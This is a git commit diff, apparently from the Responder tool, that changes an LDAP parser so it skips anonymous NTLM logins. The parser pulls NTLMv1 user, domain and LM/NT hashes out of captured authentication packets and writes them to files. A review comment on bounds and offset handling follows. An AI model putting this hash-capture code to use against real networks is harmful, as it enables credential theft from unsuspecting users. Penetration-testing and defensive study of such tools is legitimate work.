fix for anonymous NTLM connection for LDAP server

This commit is contained in:
Lgandx 2013-02-14 18:26:39 -05:00
parent f5c1f9464a
commit 1c47e7fcb1


@ -965,23 +965,28 @@ def ParseSearch(data):
def ParseLDAPHash(data,client): def ParseLDAPHash(data,client):
SSPIStarts = data[42:] SSPIStarts = data[42:]
LMhashLen = struct.unpack('<H',data[56:58])[0] LMhashLen = struct.unpack('<H',data[54:56])[0]
LMhashOffset = struct.unpack('<H',data[58:60])[0] if LMhashLen > 10:
LMHash = SSPIStarts[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() LMhashOffset = struct.unpack('<H',data[58:60])[0]
NthashLen = struct.unpack('<H',data[64:66])[0] LMHash = SSPIStarts[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashOffset = struct.unpack('<H',data[66:68])[0] NthashLen = struct.unpack('<H',data[64:66])[0]
NtHash = SSPIStarts[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() NthashOffset = struct.unpack('<H',data[66:68])[0]
DomainLen = struct.unpack('<H',data[72:74])[0] NtHash = SSPIStarts[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainOffset = struct.unpack('<H',data[74:76])[0] DomainLen = struct.unpack('<H',data[72:74])[0]
Domain = SSPIStarts[DomainOffset:DomainOffset+DomainLen].replace('\x00','') DomainOffset = struct.unpack('<H',data[74:76])[0]
UserLen = struct.unpack('<H',data[80:82])[0] Domain = SSPIStarts[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserOffset = struct.unpack('<H',data[82:84])[0] UserLen = struct.unpack('<H',data[80:82])[0]
User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','') UserOffset = struct.unpack('<H',data[82:84])[0]
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
Outfile = "LDAP-NTLMv1-"+client+".txt" writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
WriteData(Outfile,writehash) Outfile = "LDAP-NTLMv1-"+client+".txt"
print "[LDAP] NTLMv1 complete hash is :", writehash WriteData(Outfile,writehash)
logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash)) print "[LDAP] NTLMv1 complete hash is :", writehash
logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
if LMhashLen <2 :
Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
print Message
logging.warning(Message)
def ParseNTLM(data,client): def ParseNTLM(data,client):
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data) Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
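Review bot: The new `if LMhashLen > 10:` guard only protects the parse path, while every length and offset in this function is read from the client-supplied packet, and `struct.unpack('<H',data[54:56])` (like the later unpacks up to `data[82:84]`) raises `struct.error` on a packet shorter than 84 bytes, which escapes `ParseLDAPHash` unless a caller catches it; a size check before the first unpack, `if len(data) < 84: return`, closes that (the `SSPIStarts` slices themselves are safe because Python slicing clamps out-of-range indices). A length between 2 and 10 matches neither `> 10` nor `< 2`, so such a packet is dropped without any log line; reversing the structure to `if LMhashLen < 2:` with the anonymous message and a `return`, followed by the unconditional parse, would both log the gap and remove one level of nesting. Under the MS-NLMP Type 3 layout (each field is Len, MaxLen, then a 4-byte Offset) the NT, Domain and User reads at `data[64:66]`, `data[72:74]` and `data[80:82]` appear to take the MaxLen half while the moved LM read at `data[54:56]` takes Len, which is harmless while clients set both equal but worth confirming as the intended convention. `ParseLDAPHash` ends inside the hunk; `ParseNTLM` begins on the hunk's last lines and continues outside it.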